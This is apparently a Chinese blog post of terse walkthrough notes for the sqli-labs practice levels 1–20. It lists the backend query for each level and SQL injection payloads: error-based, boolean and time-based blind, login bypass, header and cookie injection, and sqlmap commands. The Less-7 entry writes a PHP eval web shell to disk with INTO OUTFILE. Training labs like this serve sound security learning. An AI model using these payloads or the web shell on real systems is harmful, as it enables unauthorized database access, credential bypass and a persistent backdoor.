• sqli-labs(Basic)

    Less-1:

    select * from table where id='1' limit 0,1;

    Less-2:

    select * from table where id=1 limit 0,1;

    Less-3:

    select * from table where id=('1') limit 0,1;

    Less-4:

    select * from table where id=("1") limit 0,1;

    盲注:

    Less-5:

    select * from table where id='1' limit 0,1;

    and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
    and updatexml(1,concat(0x7e,(select version()),0x7e),1)%23

    Less-6:

    select * from table where id="1" limit 0,1;

    Less-7:

    select * from table where id=(('1')) limit 0,1;

    and left(version(),1)=5%23
    show variables like '%secure%';
    my.ini>>secure_file_priv="/"
    union select 1,2,<?php @eval($_POST["x"])?> into outfile *"path"%23

    Less-8:

    select * from table where id='1' limit 0,1;


    基于时间盲注:

    Less-9:

    select * from table where id='1' limit 0,1;
    and sleep(5)%23
    and if(ascii(substr(database(),0,1))=115,0,sleep(5))%23

    Less-10:

    select * from table where id="1" limit 0,1;


    POST:

    Less-11:

    select * from table where username='admin' and password='admin' limit 0,1;
    admin' or '1'='1#
    1' union select 1,database()#
    sqlmap --form

    Less-12:

    select * from table where username=("admin") and password=("admin") limit 0,1;
    admin") or 1=1#
    admin") or ("1")=("1#


    盲注:

    Less-13:

    select * from table where username=('admin') and password=('admin') limit 0,1;
    and extractvalue(1,concat(0x7e,(select version()),0x7e))#

    Less-14:

    select * from table where username="admin" and password="admin" limit 0,1;


    Less15:(无法报错)

    select * from table where username='admin' and password='admin' limit 0,1;

    Less-16:

    select * from table where username=("admin") and password=("admin") limit 0,1;

    Less-17:(uname设置过滤)

    update table set password='admin' where username='admin';
    &passwd=admin'and extractvalue(1,concat(0x7e,(select version()),0x7e))%23
    sqlmap --data "uname=admin&passwd=admin&submit=Submit"

    Less-18:

    (uname,passwd设置过滤)
    insert into table(a,b,c) values('user-agent','ip','uname');
    'and '1'='1
    'and extractvalue(1,concat(0x7e,(select @@basedir),0x7e)) and '1'='1
    sqlmap -r xx.txt --technique E

    Less-19:

    insert into table(a,b) values('referer','ip');
    referer出注入

    Less-20:

    select * from table where user='cookie' limit 0,1;
    cookie处注入
  • 相关阅读:
    关于架构,关于系统,关于合作,我也得问问我们自己
    vs2013 无法打开 源 文件 "SDKDDKVer.h"
    视频基础知识汇总
    python gRPC接口调用
    python多线程同时执行2个函数任务之threading
    git基本操作_快速查询
    pycharm激活码 我是搬运工
    CodeReview的一些原则
    python多线程执行同一个函数任务之threading、ThreadPoolExecutor.map
    python程序超时处理 timeout_decorator
  • 原文地址:https://www.cnblogs.com/f1veseven/p/13399119.html
Copyright © 2020-2023  润新知